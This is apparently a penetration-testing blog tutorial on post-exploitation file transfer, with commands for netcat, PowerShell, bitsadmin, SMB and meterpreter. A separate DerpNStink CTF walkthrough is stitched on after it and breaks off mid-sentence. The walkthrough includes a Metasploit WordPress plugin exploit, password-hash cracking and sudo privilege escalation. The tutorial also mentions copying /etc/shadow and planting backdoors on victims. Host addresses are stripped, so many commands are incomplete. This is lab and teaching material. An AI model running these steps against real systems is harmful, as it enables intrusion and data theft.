Compressive Guide to File Transfer (Post Exploitation)

 In penetration testing, generally we get stuck when we transfer or download any file from compromised machine or other host machine in a network. Therefore today you will learn which method you should follow for downloading any file from compromised or other host system. All following methods are helpfully in penetration testing and also used for general purpose.
Lets starts!!

File transfer Protocol (FTP)

You all are familiar with the working of FTP server their let’s start today’s tutorial from FTP service.
When you found port 21 is open, it means FTP service is running on remote machine and you are actively looking for downloading a text file from destination machine then you can follow below 2 methods.
1st method use command-line
First connect to ftp server using host IP, enter login credential and then execute get command with file name you want to download.
get raj.txt

2nd method use Browser

Same job can be executed using browser by adding host IP in URL as, enter username and password for authentication and download your file.

Install Python FTP server
Generally many people preferred vsftpd server for FTP service for sharing file over port 21 as done above but if you are not compatible with vsftpd then you can go with 2nd option “Python FTP server” that will allows sharing of file through port 21.

sudo apt-get install python-pyftpdlib

Here I want to give access of only a particular folder “aarti” for sharing its data.
sudo python -m pyftpdlib -p 21

So when the host machine will enter destination address in URL “” and you will get anonymous login, now download the file.

Hypertext Transfer Protocol (HTTP)
Sharing file through web directory “html”

Another most well-known service for file transfer is HTTP service which uses port 80. Service apache should be activated in your machine for transferring file through web directories and after then you can move any file in to HTML directory for sharing it through http service.
So here we are transferring putty.exe file into html through following command.
cp putty.exe /var/www/html

Now let’s download putty.exe in our machine from destination server. Open your favorite browser and browse file through server address in URL. By applying this technique you can access any file from inside web directory i.e. /var/www/html of destination machine.

Sharing through Python Http server
If you are not compatible with above http method then you choose 2nd option “Simple Http server” which also a python script that use port 80 for sharing file in a network through web browser.
Here again I want to give access of only a particular folder “demo” for sharing its data.
python -m SimpleHTTPServer 80

So when the host machine will enter destination address in URL “” and you will get access for shared folder, now download the file.

HFS Tool
In above Http file sharing method we had use Ubuntu and Linux for transferring a file over port 80 and allowed other host machine to download it through web browser.
Now if you are a windows user then you can use HTS tool for performing same job. It is most popular tool used file transfer between different platforms.
·         Download the HFS and run the application
·         Now drag and drop the file you want share through web browser.

Now when user of other host machine will open Windows IP as URL in his web browser he can download the shared file.

Netcat is known as Swiss knife which is use for multiple purpose therefore we are going to use it in file transferring.
Use following command for downloading shared file from destination server
Syntax: nc [options] [listening port] > [path to store downloaded file]
nc -lvp 5555 > /root/Desktop/raj.txt

Type following command for sharing any file to host machine in the network.
Syntax: nc host IP host port < file.txt
nc 5555 < raj.txt

Now you can observe that we have successfully downloaded raj.txt file at the desktop of our host machine.

Curl command-line tool for transferring data using various protocols. And is also use for download the data from any website or host machine, following command will download putty.exe file from website.
curl -O

Similarly execute given below command for downloading putty WWW.
curl -O

Execute given below command for downloading particular file. The downloaded file stores in a current directory. It give indication of download progresssizedate and time though downloading the file.
Enter given below command for downloading any file from html directory of apache server.
Similarly execute given below command for downloading putty WWW.

Trivial File Transfer Protocol (TFTP)
TFTP service was used to read and write any file using a remote connection, it used UDP port 69 for sharing file and do not uses  authentication hence it is less secure than FTP.
Here I had created a demo.txt file inside tftp folder for sharing.

Metasploit contain a module that provides tftp service for file sharing.
use auxiliary/server/tftp
msf auxiliary(server/tftp) > set srvhost
msf auxiliary(server/tftp) > set TFTPROOT /root/tftp
msf auxiliary(server/tftp) > exploit

Now open command prompt and execute given below command for downloading demo.txt file in you system.
Syntax: tftp -i host IP GET file name.txt
tftp -i GET demo.txt
As you can observe from given below image it has store downloaded in current directory.

SMB Server using Python script
Now we will use a python script that activates SMB service in our Linux machine. You can visit to github for this python script.
I copied the python code from github and past it into a text file as in desktop folder. Now execute give below command for a share folder “raj”.
python raj/root/share

Downloading file from Linux SMB server in Windows Machine
Since we are aware of smb service which is running in host machine and being using window platform we can access it share folder through Run command prompt.

Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it.

In this way we can use smb python script for sharing file between windows and Linux machine.

Downloading file from Linux SMB server in Ubuntu Machine

If you are an Ubuntu user then you can use smbclient service for accessing share folder of smb server.
apt-get install smbclient
Now execute given below command for accessing share folder of server.
smbclient -L
From given below image can observe it has shown share folder is “RAJ”

Now execute given below command for accessing share folder raj and download the data present inside it.
smbclient //
Since folder raj has two text file user.txt and pass.txt and we are going to download user.txt through below command.
get user.txt

Download file through Meterpreter
In penetration testing when we compromise target machine and own his meterpreter session using metasploit then inside meterpreter we can execute following command for downloading any file form victim’s machine.
Meterpreter> download raj.txt /root/Desktop

Use Cat command
Cat is very beautiful command and can perform remarkable job if you will use it wisely, suppose you found any text file in host machine and you are unable to download it then open that file through cat command.
For example: I want to know the text inside user.txt then I will execute following command then copy that text into a new text document and save it in our machine.

Cat user.txt

Download file using Window PowerShell
If you are windows user and have command shell access then you can choose PowerShell for downloading any web server file. Execute given below command in command prompt as administrator.
(new-object System.Net.WebClient).DownloadFile(‘',’d:\data\putty.exe)
From given below image you can observe we had successfully download putty.exe in d: drive.

Download file using BITSAdmin
BITSAdmin is command-line utility for window platform that allows user to downloading and uploading of a file. If you want to download any file from http then you can use following command. It is similar as PowerShell work under admin privileged. Therefore run cmd as administrator and execute given below command for downloading putty. 

bitsadmin /transfer job F:\putty.exe

Now it will start downloading and also gives updates while downloading such as job type i.e downloading, priority and status.

From given below image you can observe that we had downloaded putty.exe in f: drive.

Sharing File through  PHP
PHP is also avialabe for the same purpose, when above method is not compatible for sharing file between two hosts. You need to execute the following commnad to turn on the HTTP listener. As you know, I have saved a shell script on the Desktop therefore we are runing below command on Desktop.

php -S

Now you can use wget or other application for downloading shell script from remote address i.e. 192.168..1.103/shell.elf

SCP File Transfer
Secure copy protocol (SCP) is a means of securely moving any files between a local host and a remote host or between two remote hosts. It is based on the Secure Shell (SSH). Here I have created a new file scp.txt inside /home/raaz and then try to transfer this file to remote machine with help of following command.
Syntax: scp SourceFile user@host:~/path of directory

scp scp.txt aarti@

Now let’s confirm the transformation by inspecting remote directory and as you can observe we have successfully received scp.txt file in our remote pc.

Similarly we can transfer any backdoor from attacker machine to victim’s machine or can copy some system files such as /etc/passwd and /etc/shadow from victim’s machine.

Hack the DerpNStink VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as DerpNStink. The credit for making this vm machine goes to “Bryan Smith” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at but you will have to find your own)

Use nmap for port enumeration
nmap -p- -A --open

Nmap scan tells us port 21,22 and 80 are open. As port 80 is running http server we open the ip in our browser and run dirb scan.

Dirb scan shows that the server has wordpress, and when we open /weblog/ directory. When we open /weblog/ directory we get redirected to derpnstink.local/weblog/

So we add domain name in hosts file to get access to the site.

We first open the domain to check if something new has been added to the website, when we take a look at the source page we find the 1st flag.

Now when we open http://derpnstink.local/weblog we find that it a wordpress site.

We use wpscan to enumerate the plugins and themes and users.
wpscan –u --enumerate at --enumerate ap –enumerate u

Wpscan shows us that a plugin is exploitable.

We also find username and password to be admin for both.

We use metasploit to exploit this vulnerability.
msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit

After getting reverse shell we open wp-config.php and find the name of the database and the user required to access the database.

We find the username and password required through mysql.

We also find two directories we cannot access that also hints us the username.

After logging through phpmyadmin, we find two hashes in wordpress database.

We use john the ripper to crack the hashes and find a password for stinky as wedgie57.

When we login through wordpress using username stinky and password wedgie57, we find 2nd flag.

We now login to the system through user stinky and password wedgie57. Now going through the system we find our 3rd flag. We also find a pcap file.

Enumerating through the system we find a file called derpissues.txt that we hints us to use the pcap file we found earlier.

Going through the files we found a ssh key, but we were unable to login through ssh using this key.

Now we copy the pcap file into the ftp directory, to download the file into our system through ftp.

We connect to the target machine through ftp and download the pcap file into our system.

After download the file into our system we open it in wireshark and find the password for the other user

Now we login as mrderp and take a look at the sudoers file and find that we can run a file that starts with derpy as root in /home/mrderp/binaries/derpy*

To run our file as root we create a directory called binaries in /home/mrderp/ directory

Now we create a bash script to spawn to bash shell and save it as